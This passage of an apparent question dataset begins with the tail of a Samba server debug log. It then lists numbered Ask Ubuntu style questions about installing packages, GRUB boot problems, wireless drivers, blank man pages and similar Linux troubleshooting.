../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.431155 , 3 ] ../source3/smbd/dir.c:1149 ( smbd_dirptr_get_entry ) smbd_dirptr_get_entry mask= [ * ] found ./temp fname=temp ( temp ) [ 2013/10/11 12:36:48.433145 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1427 of length 76 ( 0 toread ) [ 2013/10/11 12:36:48.433203 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.433248 , 3 ] ../source3/smbd/trans2.c:3642 ( call_trans2qfsinfo ) call_trans2qfsinfo : level = 513 [ 2013/10/11 12:36:48.433293 , 3 ] ../source3/smbd/trans2.c:3092 ( smbd_do_qfsinfo ) smbd_do_qfsinfo : level = 513 [ 2013/10/11 12:36:48.434366 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1428 of length 76 ( 0 toread ) [ 2013/10/11 12:36:48.434419 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.434464 , 3 ] ../source3/smbd/trans2.c:3642 ( call_trans2qfsinfo ) call_trans2qfsinfo : level = 261 [ 2013/10/11 12:36:48.434507 , 3 ] ../source3/smbd/trans2.c:3092 ( smbd_do_qfsinfo ) smbd_do_qfsinfo : level = 261 [ 2013/10/11 12:36:48.435922 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1429 of length 132 ( 0 toread ) [ 2013/10/11 12:36:48.435975 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.436020 , 3 ] ../source3/smbd/trans2.c:5291 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo : transact2_qpathinfo : level = 263 [ 2013/10/11 12:36:48.436069 , 3 ] ../source3/smbd/vfs.c:1118 ( check_reduced_name ) check_reduced_name [ theme_innocompany.tar.gz ] [ /home/samba/shares/activeline ] [ 2013/10/11 12:36:48.436119 , 3 ] ../source3/smbd/vfs.c:1248 ( check_reduced_name ) check_reduced_name : theme_innocompany.tar.gz reduced to /home/samba/shares/activeline/theme_innocompany.tar.gz [ 2013/10/11 12:36:48.436174 , 3 ] ../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.436216 , 3 ] ../source3/smbd/trans2.c:5436 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo theme_innocompany.tar.gz ( fnum [ fsp is null ] ) level=263 call=5 total_data=0 [ 2013/10/11 12:36:48.437828 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1430 of length 132 ( 0 toread ) [ 2013/10/11 12:36:48.437882 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.437927 , 3 ] ../source3/smbd/trans2.c:5291 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo : transact2_qpathinfo : level = 263 [ 2013/10/11 12:36:48.437976 , 3 ] ../source3/smbd/vfs.c:1118 ( check_reduced_name ) check_reduced_name [ theme_innocompany.tar.gz ] [ /home/samba/shares/activeline ] [ 2013/10/11 12:36:48.438026 , 3 ] ../source3/smbd/vfs.c:1248 ( check_reduced_name ) check_reduced_name : theme_innocompany.tar.gz reduced to /home/samba/shares/activeline/theme_innocompany.tar.gz [ 2013/10/11 12:36:48.438080 , 3 ] ../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.438122 , 3 ] ../source3/smbd/trans2.c:5436 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo theme_innocompany.tar.gz ( fnum [ fsp is null ] ) level=263 call=5 total_data=0 [ 2013/10/11 12:36:48.440036 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1431 of length 132 ( 0 toread ) [ 2013/10/11 12:36:48.440090 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.440134 , 3 ] ../source3/smbd/trans2.c:5291 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo : transact2_qpathinfo : level = 263 [ 2013/10/11 12:36:48.440190 , 3 ] ../source3/smbd/vfs.c:1118 ( check_reduced_name ) check_reduced_name [ theme_innocompany.tar.gz ] [ /home/samba/shares/activeline ] [ 2013/10/11 12:36:48.440239 , 3 ] ../source3/smbd/vfs.c:1248 ( check_reduced_name ) check_reduced_name : theme_innocompany.tar.gz reduced to /home/samba/shares/activeline/theme_innocompany.tar.gz [ 2013/10/11 12:36:48.440293 , 3 ] ../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.440335 , 3 ] ../source3/smbd/trans2.c:5436 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo theme_innocompany.tar.gz ( fnum [ fsp is null ] ) level=263 call=5 total_data=0 [ 2013/10/11 12:36:48.441920 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1432 of length 122 ( 0 toread ) [ 2013/10/11 12:36:48.441973 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbopenx ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.442025 , 3 ] ../source3/smbd/vfs.c:1118 ( check_reduced_name ) check_reduced_name [ theme_innocompany.tar.gz ] [ /home/samba/shares/activeline ] [ 2013/10/11 12:36:48.442075 , 3 ] ../source3/smbd/vfs.c:1248 ( check_reduced_name ) check_reduced_name : theme_innocompany.tar.gz reduced to /home/samba/shares/activeline/theme_innocompany.tar.gz [ 2013/10/11 12:36:48.442170 , 3 ] ../source3/smbd/dosmode.c:160 ( unix_mode ) unix_mode ( theme_innocompany.tar.gz ) returning 0664 [ 2013/10/11 12:36:48.443497 , 3 ] ../source3/smbd/open.c:791 ( open_file ) error opening file theme_innocompany.tar.gz ( nt_status_access_denied ) ( local_flags=0 ) ( flags=0 ) [ 2013/10/11 12:36:48.443579 , 3 ] ../source3/smbd/error.c:82 ( error_packet_set ) nt error packet at ../source3/smbd/error.c ( 165 ) cmd=45 ( smbopenx ) nt_status_access_denied [ 2013/10/11 12:36:48.444662 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1433 of length 132 ( 0 toread ) [ 2013/10/11 12:36:48.444717 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.444762 , 3 ] ../source3/smbd/trans2.c:5291 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo : transact2_qpathinfo : level = 263 [ 2013/10/11 12:36:48.444812 , 3 ] ../source3/smbd/vfs.c:1118 ( check_reduced_name ) check_reduced_name [ theme_innocompany.tar.gz ] [ /home/samba/shares/activeline ] [ 2013/10/11 12:36:48.444862 , 3 ] ../source3/smbd/vfs.c:1248 ( check_reduced_name ) check_reduced_name : theme_innocompany.tar.gz reduced to /home/samba/shares/activeline/theme_innocompany.tar.gz [ 2013/10/11 12:36:48.444917 , 3 ] ../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.444959 , 3 ] ../source3/smbd/trans2.c:5436 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo theme_innocompany.tar.gz ( fnum [ fsp is null ] ) level=263 call=5 total_data=0 [ 2013/10/11 12:36:48.446575 , 3 ] ../source3/smbd/process.c:1794 ( process_smb ) transaction 1434 of length 132 ( 0 toread ) [ 2013/10/11 12:36:48.446628 , 3 ] ../source3/smbd/process.c:1397 ( switch_message ) switch message smbtrans2 ( pid 15813 ) conn 0x203ad30 [ 2013/10/11 12:36:48.446673 , 3 ] ../source3/smbd/trans2.c:5291 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo : transact2_qpathinfo : level = 263 [ 2013/10/11 12:36:48.446722 , 3 ] ../source3/smbd/vfs.c:1118 ( check_reduced_name ) check_reduced_name [ theme_innocompany.tar.gz ] [ /home/samba/shares/activeline ] [ 2013/10/11 12:36:48.446771 , 3 ] ../source3/smbd/vfs.c:1248 ( check_reduced_name ) check_reduced_name : theme_innocompany.tar.gz reduced to /home/samba/shares/activeline/theme_innocompany.tar.gz [ 2013/10/11 12:36:48.446825 , 3 ] ../source3/locking/share_mode_lock.c:408 ( fetch_share_mode_unlocked ) could not fetch share entry [ 2013/10/11 12:36:48.446868 , 3 ] ../source3/smbd/trans2.c:5436 ( call_trans2qfilepathinfo ) call_trans2qfilepathinfo theme_innocompany.tar.gz ( fnum [ fsp is null ] ) level=263 call=5 total_data=0
356642	unable to install gnuplot	i tried installing gnuplot using the command : sudo apt-get install gnuplot and i got the following error reading package lists ... done building dependency tree reading state information ... done e : could n't find package gnuplot what to do ?
356643	application crash reporting `` this problem report is damaged and can not be processed ''	i have either an application that crashes almost straight after logging in or i have an old crash report that attempts to be reported and which fails . i 'm erring towards the latter but i can not be sure which if the two cases is true . this results the following dialog being presented : clicing [ report problem ... ] results in : this sequence repeats twice and then does not return until i log out and log back in . i have searched on google for the phrase `` this problem report is damaged and can not be processed '' but all i am able to find are issues regarding the dialog stating `` ioerror ( 13 , 'permission denied ' ) '' . searching google for `` error ( 'incorrect padding ' , ) '' finds some issues but none that appear to be related to ubuntu reporting an application crash . my best guess is that there is a corrupt application crash report and that the tool that reports the crashes is unable to use that report . are application crash reports stored in a specific directory and/or log file such that i can find the offending report and delete it ? if not , what else can i try to stop this from occurring ?
356644	how do i execute a program with default variables ?	how can i execute a program ( specifically a bash alias ) with the default environment variables ? consider this example : export test= '' something i dont want to exist '' alias _xterm='xterm -fn 7x13 -fa `` ubuntu mono : size=12 : antialias=false '' ' _xterm in the spawned xterm instance , the variable $ test should n't be set .
356645	broadcom 's bcm43227 freezes ubuntu	i am running an ubuntu 13.04 ( fresh installation ) in my laptop acer aspire 5750g . after being working some time , ubuntu gets stuck , it freezes , and the only thing i can do is to switch off the laptop . i had the same problem with ubuntu 12.04 . after several tests and having tried everything i could , i came up with the problem : the wireless card and its driver . i have a broadcom bcm43227 and the driver i use is bcmwl . i suspect the problem comes from there , because when i am connected through a wired ethernet connection , the laptop works perfectly . however , while working wireless , i always get frozen . i went through all the installation instructions of bcm drivers i found in several forums , but nothing works for me . i mean , i have a wireless connection , i can connect to the internet and everything goes as it should , but it suddenly gets stuck . i hope someone could help me . thanks in advance !
356650	how to open multiple files with the default program from terminal ?	i tried to open all my .mp3 files from a folder using xdg-open but i found out it opens just one ! so i searched a little but there was not such a question ! i found `` evince '' but apparently it open text files and gnome-open also opens one file . i want to open all files of the same format in a folder from the terminal . i 'm new to ubuntu so please explain a little more .
356652	how does command-not-found determines if user is administrator	i am administrator of two ubuntu servers . on one of them , when i try to run a command ( for instance irb1.9.1 ) from a package that is not installed , i get the following message : the program 'irb1.9.1 ' is currently not installed . you can install it by typing : sudo apt-get install ruby1.9.1 on the other server , i get the following answer : the program 'irb1.9.1 ' is currently not installed . to run 'irb1.9.1 ' please ask your administrator to install the package 'ruby1.9.1' i can sudo on both servers , so i do n't understand how the first one knows i can install the package myself and shows me the command to run , while the second does n't . where does the difference come from and how can i get the second server to give me the command like the first server ? edit to answer braiam 's comment , apt-cache policy return the same on both servers : $ apt-cache policy command-not-found command-not-found : installed : 0.3ubuntu7.1 candidate : 0.3ubuntu7.1 version table : *** 0.3ubuntu7.1 0 500 http : //dk.archive.ubuntu.com/ubuntu/ raring-updates/main amd64 packages 100 /var/lib/dpkg/status 0.3ubuntu7 0 500 http : //dk.archive.ubuntu.com/ubuntu/ raring/main amd64 packages
356655	kerberos ticket watcher	i just switched from opensuse to ubuntu 12.04 . at work we use kerberos to auth to different systems . in opensuse i had a nice little tray app `` kerberos ticket watcher '' that could renew and initialise new tickets as they expired . i have installed `` kerberos authentication '' , but i ca n't find out how to run it from the tray ( background ) . the version is 3.2.1 ( last stable release ) . so the question is ... can i have kerberos authentication running as a tray app or is there some other app that can solve this ? i have seen this solution , http : //ubuntuforums.org/showthread.php ? t=1575699 , but i would prefer to have a dedicated app for it . thanks in advance
356657	gparted increase size of -- linux partition	i need to increase the size of the linux /dev/sda8 ext4 partition . it only has 779 mb free . to do that , i thought of shrinking sda5 and then move sda6 and sda7 . but after this when i tried to change the start point of the linux /dev/sda8 partition gparted gives me warning that `` if we change start location of the boot partition o.s may not boot '' . will it have some harmfull effect ? if i change the start location of sda8 will it have some harmfull affect ? do ihave to change grub configuration after moving linux partition ? i do not have any option apart from this to increase size of sda8 . please see the below image for a screenshot of my gparted :
356659	ever had issues installing on acer aspire 5000 ?	keep in mind , i 'm a complete newb who has never installed before . my computer is a standard acer aspire 5000 ( from 2006 ) and was wondering if anybody else has done this install and can tell me if anything went wrong ... like no wireless internet connection , or being really slow , etc ...
356663	what is the difference between idle3 and idle-python3.2	i installed them both via apt-get install and they seem to be the same . if i start them they both open up a python shell
356665	what are alternative program for etabs ?	hi i 'm new to ubuntu but i like it so much that i am telling all my friends to get rid of windows and start ubuntu.but there is this problem : many of my friends are engineers and so they have to use `` 3d max '' `` etabs '' and `` autocad '' i wanted to know if there is any alternative program like these ? ( i know about wine but i 'm asking for any alternative )
356669	ubuntu partition filesystem not detected after win 8 install	i installed windows 8 over an existing dual boot of windows 7 and ubuntu . i thought , like all times , a simple grub reinstall would fix the issue . but this time something weird happened . i ran boot-repair from a liveusb , rebooted , but still did n't get grub . then i started investigating a bit . here 's fdisk : device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 204802047 102297600 7 hpfs/ntfs/exfat /dev/sda3 204804094 283410431 39303169 5 extended partition 3 does not start on physical sector boundary . /dev/sda4 283410432 976773119 346681344 7 hpfs/ntfs/exfat /dev/sda5 267788288 283410431 7811072 82 linux swap / solaris windows is in sda2 and ubuntu in sda3 ( ext3 ) . if i try to mount it : sudo mount /dev/sda3 /mnt mount : you must specify the filesystem type here 's parted -l : number start end size type file system flags 1 1049kb 106mb 105mb primary ntfs boot 2 106mb 105gb 105gb primary ntfs 3 105gb 145gb 40.2gb extended 5 137gb 145gb 7999mb logical linux-swap ( v1 ) 4 145gb 500gb 355gb primary ntfs so i 'm not able to detect the file system of my ubuntu partition ! here 's the boot-repair log : http : //paste.ubuntu.com/6221718/ what can i do ?
356673	how do i simply add packages to a server install usb and modify the preseed file ?	i want to install a standard desktop with updates on several machines , but not enough of them for it to be worth a pxe boot server , hosting my own repo mirror , etc . i 've looked at this : how to modify ubuntu precise .iso preseed ? but that seems crazy to create an iso in a bunch of steps and then burn the iso to a usb drive . would n't it be possible to take updated and additional packages , put them in /pool , edit a preseed , update the package list , and be done with it ? i 'm looking to both install updates and turn on repos like backports . i 'd also like to include chrome from google and install squid-deb-proxy out of the gate . p.s . i wish squid-deb-proxy was a standard installed package .
356674	touchpad not working on acer travelmater x483 during and after installation of 12.04	i have tried fn+f7 , that , did not work . all your responses is greatly appreciated . thank you in advanced .
356677	fatal error : /usr/include/boost/coroutine/coroutine.hpp : no such file or directory	fatal error : /usr/include/boost/coroutine/coroutine.hpp : no such file or directory /usr/include/boost can not find coroutine , where is it ?
356678	why does n't php ( cli ) have a default memory limit ?	after coming across a server that had an out of memory issue from a commandline php-script , i discovered that default ( vanilla 12.04 lts server install ) the cli php.ini does not have a memory limit set . myname @ servername : ~ $ php -i | grep memory_limit memory_limit = > -1 = > -1 myname @ servername : ~ $ this was a brand new 12.04 install , choosing 'lamp ' during installation , especially set up for testing this default value . this surpised me , and i 'm wondering why this is so , and even if this is deliberate ?
356680	apache2 web hosting	i have my apache2 server run it works but when i inter my site name into my browser i get nothing but when i enter my ip i do n't get the default page i get ( index of / ) page and it has a folder that has my site in it . does anyone know what is going on here ? thank you
356681	how can i use audio keys on vlc ?	my audio keys on keyboard ( play/pause or next ) work with rythmbox but not with vlc player . how can i use these keys with vlc . and specially when vlc is not on top of other windows ?
356685	my grub menu is not showing up my windows8	i 've installed ubuntu 13.04 as dualboot alongside my windows 8 dell inspiron machine . after installing each time i boot my pc. , the grub menu is showing only ubuntu and if i want to start my pc as windows 8 . , i have to start boot menu by hitting f12 and have to select windows boot manager manually . searched so many issues over net but could not find solution . will be very thankful for your valuable solutions . thanks in advance ps . i 'm new to ubuntu
356686	error ccny_g2o [ fail ] - mapping	i 'm following the steps of ccny_rgbd_tools installation in github.com and it runs smoothly until the `` compile the stack '' rosmake ccny_rgbd_tools there is a failure with ccny_g2o . i 've tried to fix it using the next step : sudo apt-get remove ros-groovy-libg2o but when i compile it again , it still gives me the same error . is it possible that this error may induce future errors in the openni_launch ? how can i fix this error ? thank you .
356688	ca n't install skype wants to remove some skype	i tried purging skype and reinstalling it it was crashing on my ubuntu 12 but now i am getting a message when i try to install skype which says you need to remove the following software to install you must remove the following items '' wherever you are where ever they are ''
356689	ubuntu man command display blank pages	linux 3.8.0-31-generic # 46-ubuntu smp tue sep 10 20:03:44 utc 2013 x86_64 x86_64 x86_64 gnu/linux hello , my manpages are blank ; when i type something like man ls in my terminal it displays a blank page with only the following : manual page man ( 1 ) line ? / ? ( end ) ( press h for help or q to quit ) i already try to uninstall the man packages with both dpkg and apt-get command , check my path and the man config file ... but i obviously missing something ; is anyone can help me to solved this ? thanks . sudo apt-get -- purge remove manpages manpages-dev freebsd-manpages funny-manpages gmt-manpages man2html manpages-posix manpages-posix-dev asr-manpages sudo apt-get install manpages manpages-dev freebsd-manpages funny-manpages gmt-manpages man2html manpages-posix manpages-posix-dev asr-manpages which man /usr/bin/man echo $ path /home/franchin/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : / > usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /usr/bin/man sudo mandb -c ... processing manual pages under /usr/local/share/man ... 131 man subdirectories contained newer manual pages . 5731 manual pages were added . 0 stray cats were added . cat /etc/manpath.config magic magic.mime mailcap mailcap.order manpath.config franchin @ n53jq : ~ $ cat /etc/manpath.config # manpath.config # # this file is used by the man-db package to configure the man and cat paths . # it is also used to provide a manpath for those without one by examining # their path environment variable . for details see the manpath ( 5 ) man page . # # lines beginning with ` # ' are comments and are ignored . any combination of # tabs or spaces may be used as `whitespace ' separators . # # there are three mappings allowed in this file : # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # mandatory_manpath manpath_element # manpath_map path_element manpath_element # mandb_map global_manpath [ relative_catpath ] # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # every automatically generated manpath includes these fields # # mandatory_manpath /usr/src/pvm3/man # mandatory_manpath /usr/man mandatory_manpath /usr/share/man mandatory_manpath /usr/local/share/man # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # set up path to manpath mapping # ie . what man tree holds man pages for what binary directory . # # *path* - > *manpath* # manpath_map /bin /usr/share/man manpath_map /usr/bin /usr/share/man manpath_map /sbin /usr/share/man manpath_map /usr/sbin /usr/share/man manpath_map /usr/local/bin /usr/local/man manpath_map /usr/local/bin /usr/local/share/man manpath_map /usr/local/sbin /usr/local/man manpath_map /usr/local/sbin /usr/local/share/man manpath_map /usr/x11r6/bin /usr/x11r6/man manpath_map /usr/bin/x11 /usr/x11r6/man manpath_map /usr/games /usr/share/man manpath_map /opt/bin /opt/man manpath_map /opt/sbin /opt/man # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # for a manpath element to be treated as a system manpath ( as most of those # above should normally be ) , it must be mentioned below . each line may have # an optional extra string indicating the catpath associated with the # manpath . if no catpath string is used , the catpath will default to the # given manpath . # # you *must* provide all system manpaths , including manpaths for alternate # operating systems , locale specific manpaths , and combinations of both , if # they exist , otherwise the permissions of the user running man/mandb will # be used to manipulate the manual pages . also , mandb will not initialise # the database cache for any manpaths not mentioned below unless explicitly # requested to do so . # # in a per-user configuration file , this directive only controls the # location of catpaths and the creation of database caches ; it has no effect # on privileges . # # any manpaths that are subdirectories of other manpaths must be mentioned # *before* the containing manpath . e.g . /usr/man/preformat must be listed # before /usr/man . # # *manpath* - > *catpath* # mandb_map /usr/man /var/cache/man/fsstnd mandb_map /usr/share/man /var/cache/man mandb_map /usr/local/man /var/cache/man/oldlocal mandb_map /usr/local/share/man /var/cache/man/local mandb_map /usr/x11r6/man /var/cache/man/x11r6 mandb_map /opt/man /var/cache/man/opt # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # program definitions . these are commented out by default as the value # of the definition is already the default . to change : uncomment a # definition and modify it . # # define pager pager -s # define cat cat # define tr tr '\255\267\264\327 ' '\055\157\047\170' # define grep grep # define troff groff -mandoc # define nroff nroff -mandoc # define eqn eqn # define neqn neqn # define tbl tbl # define col col # define vgrind vgrind # define refer refer # define grap grap # define pic pic -s # # define compressor gzip -c7 # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # misc definitions : same as program definitions above . # # define whatis_grep_flags -i # define apropos_grep_flags -iew # define apropos_regex_grep_flags -ie # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # section names . manual sections will be searched in the order listed here ; # the default is 1 , n , l , 8 , 3 , 0 , 2 , 5 , 4 , 9 , 6 , 7 . multiple section # directives may be given for clarity , and will be concatenated together in # the expected way . # if a particular extension is not in this list ( say , 1mh ) , it will be # displayed with the rest of the section it belongs to . the effect of this # is that you only need to explicitly list extensions if you want to force a # particular order . sections with extensions should usually be adjacent to # their main section ( e.g . `` 1 1mh 8 ... '' ) . # section 1 n l 8 3 2 3posix 3pm 3perl 5 4 9 6 7 # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # range of terminal widths permitted when displaying cat pages . if the # terminal falls outside this range , cat pages will not be created ( if # missing ) or displayed . # # mincatwidth 80 # maxcatwidth 80 # # if catwidth is set to a non-zero number , cat pages will always be # formatted for a terminal of the given width , regardless of the width of # the terminal actually being used . this should generally be within the # range set by mincatwidth and maxcatwidth . # # catwidth 0 # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - # flags . # nocache keeps man from creating cat pages . # nocache
356691	using hdmi to my tv all works fine but xbmc wont open to the tv only to the laptop screen ?	everything else works fine . it loads fine but then the hdmi connection drops and it goes to the laptop screen . i 've looked through settings and ca n't find alternate display methods other than display # 1 and window mode . what gives ?
356692	gdbus.error : org.openobex.error.failed : unable to request session problem	this image & title explains all any way to solve this gdbus.error : org.openobex.error.failed : unable to request session error
356694	how can i connect to a microsoft access database using php ?	i tried to connect to ms access database using php pdo from my ubuntu webserver but could n't . i got this error : connexion access échouée : sqlstate [ im002 ] sqldriverconnect : 0 [ unixodbc ] [ driver manager ] data source name not found , and no default driver specified my connection class is : class gesecoleservice { var $ dsn ; var $ user ; var $ password ; var $ dbh ; public function connect ( ) { $ this- > dsn = 'odbc : driver= { microsoft access driver ( *.mdb ) } ; dbq=/var/www/rep/bd/gesecoles.mdb ; uid= ' ; $ this- > user = '' ; $ this- > password = '' ; try { $ this- > dbh = new pdo ( $ this- > dsn , $ this- > user , $ this- > password ) ; } catch ( pdoexception $ e ) { echo 'connexion access ã©chouã©e : ' . $ e- > getmessage ( ) ; } } }
356698	xrandr gives black background	i use ubuntu 12.04 on a toshiba portege r600 . normally i have a flat green background ( the middle choice of the custom set under wallpapers in the right-mouse-click gui ) . when i plug in a vga monitor for two-screen usage the background on that and on the laptop screen go black . they remain black after i unplug the monitor and give the command : xrandr -- output lvds1 -- auto -- output vga1 -- off is there a trick to maintain the green blackground , at least on the laptop screen , or at least regain it automatically on the laptop screen ?
356699	how to avoid installing custom packages twice on ubuntu 12.04	i have created a custom packages using dpkg -- build . in the debian dir i have placed all the required files for package installation namely control , preinst , postinst , prerm etc . when i try to install the package i would like to check whether the same package is installed or not . if it is installed i would like to abort package installation . i have tried using conflicts as well as breaks rules in control file but to no avail . here is a documentation which suggests that it is not possible with the help of conflicts & breaks tag names . a special exception is made for packages which declare that they break their own package name or a virtual package which they provide ( see below ) : this does not count as a real breakage . a special exception is made for packages which declare a conflict with their own package name , or with a virtual package which they provide ( see below ) : this does not prevent their installation , and allows a package to conflict with others providing a replacement for it . if any one knows how to do it it would be of real help .
356701	how can wget download a webpage with php as plain html ?	i want to download a website that uses php to generate its pages . if i use wget -- convert-links -- mirror -- trust-server-names the_website.com the php files are downloaded as php files . when i open the webpage locally , ff gives me a popup box asking whether i want to open the php file of a page with gedit . is there any way to download a full web page as plain html so that i can access them in a browser locally ?
356702	error 0xc000007b after installing ubuntu 13.10	i am trying to install ubuntu 13.10 64bit with uefi enabled ( since windows came preinstalled ) and i want to keep windows . i created a partition , installed ubuntu successfully and then i repaired grub2 with boot-repair . i get the black on gray dialog that displays the windows and ubuntu entries but when i select ubuntu i get an error : \efi\ubuntu\grubx64.efi 0xc0000007b saying that the file is corrupt or does n't exist . is there any way to fix this ? i tried it with and without secure boot enabled . edit : the notebook is a sony vaio s if it helps .
356705	failed to load the package list ( trying to install flash player ) ( lubuntu 13.04 )	i 'm trying to find a solution for a few days , i hope someone can answer me . i tried several times to install flash player through lubuntu software center , and after i hit `` install packages '' it gives me an error : failed to load the package list this is a serious problem . try again later . if this problem appears again , please report an error to the developers . > details e : type 'sudo ' is not known on line 60 in source list /etc/apt/sources.list . i think that i accidently , couple weeks ago , tried to add reposetories to my sources.list and i saved it . if this the problem , is there a way to make a new sources.list ?
356710	how to change setting for automatic shut down ?	i want my server system to be kept on for always . i do n't want it to shut down automatically . what is the setting commands for it ? my server version is 10.04.4
356711	how do i block grub from appearing when resuming from hibernation ?	when my computer boots up after being shut down , grub has a timeout . i want the same behavior after waking up from hibernation . any ideas how to accomplish this ? edit : here 's a clarification of the current and desired behaviors : currently when i open laptop after hibernation , grub appears and has no timeout . i do not want grub to appear while resuming after hibernation .
356718	wireless network connection help on 12.04 ?	i have all the drivers i need for my ubuntu 12.04 , but whenever i start up my computer it says there 's no networks available . i go into additional drivers and it says there 's a broadcom one available , so i click download . then it gives some error about not being able to get the driver , and then all of a sudden , the wireless works . it 's just a minor inconvenience at the moment , but i 'm wondering if there 's some way to fix this so i do n't have to do this every time i start up the laptop .
356720	is it possible to connect ( wireless ) a usb printer to wlan ?	i 've been wanting to be able to print through an hp psc 1315 printer over wifi ( printer has no wifi ; it works with usb ! ) . so i just was thinking about connecting a wifi dongle to it . would that be possible solution ? i 've just read this : http : //www.linux-magazine.com/online/features/airprint but i am not sure ( 1 ) if this is relevant to my situation and ( 2 ) whether this could work without an always running machine . hope you could help me out on this . thanks
356723	phablet-dev-bootstrap does not proceed	i would like to try to port ubuntu touch for a desire s i have borrowed for a while . however , phablet-dev-bootstrap fails : [ ... ] object e76efdd7b342577c40aa271fa5ded9d66a783a9b type commit tag v1.12.4 tagger conley owens 1380645867 -0700 repo 1.12.4 gpg : podpisano wto , 1 paź 2013 , 18:44:27 cest z użyciem rsa kluczem o id 692b382c gpg : nie można sprawdzić podpisu : brak klucza publicznego error : could not verify the tag 'v1.12.4' has anyone experienced such an error and found any solution ?
356725	graphic driver on my samsung laptop np550s01	i have got ubuntu 13.04 installed on my samsung np550 ( 64bit ) with nvidia optimus . need to know how to install nvidia driver and which way.. ?
356726	how to uninstall and reinstall gnome 3.10 ?	i installed gnome 3.10 . i had gnome 3.8 and liked it very much . unfortunately , with 3.10 it seems like something went wrong . none of the backgrounds work and the buttons to log out and shut down are missing . how can i uninstall and reinstall gnome 3.10 ? i am running ubuntu 13.04 . i originally installed it by : sudo add-apt-repository ppa : ricotz/testing sudo add-apt-repository ppa : gnome3-team/gnome3 sudo add-apt-repository ppa : gnome3-team/gnome3-staging sudo apt-get update sudo apt-get install gnome-shell
356727	running latex via command line on ubuntu server	on an ubuntu 10 server ( yes , not the latest version anymore ) , i would like to run latex so that i can invoke the program via command line and pass .tex files to compile . is this possible ? tex live would be one of the distributions that you can choose , right ? i can just install it with the following command , ca n't i ? sudo apt-get install texlive and then ? how can i invoke tex live via command line , without a gui ( as this is on a web server ) ?
356728	flickering screen after wubi installing ubuntu 12.04.3 on acer aspire 5000	so i installed wubi - ran it - it seemed okay . then a minute after seeing the ubuntu logo and `` preparing to run ubuntu for the first time '' it showed me a few errors , then screen kept flickering violently and i got scared so i forced a shut down , now in safe mode ( i 'm always in safe mode ) . could not remember anything about the errors other than they 're related to b43 and it also told me to go to some kernel website for a download . yes - i already know about using the b43 installer commands to access wifi but i think this problem lies in actually installing ubuntu . anybody needs system info , i 'm glad to give it . i 'm really wanting ubuntu . ca n't stand windows anymore . **update : **i noticed that c : \ubuntu exists 0.0 and it is the size that i chose for installation ... what could this mean ? ? ? it did n't seem like it installed but according to my c drive it did . what do i do ?
356736	no battery indicator when logged in as second ( non-sudo ) user	i 'm using ubuntu 12.04 with unity . i have a setup with two users , one with sudo privileges for admin use , and one without for daily use . when logged in as the non-privileged user , there 's no battery indicator . when logged in as the sudo user , the battery indicator is present . checking in dconf ( with dconf-editor ) , the battery indicator seems to be enabled . and the superuser does n't seem to be member of any groups which govern power management . so what do i need to enable the battery indicator for all users ? thanks in advance for any help .
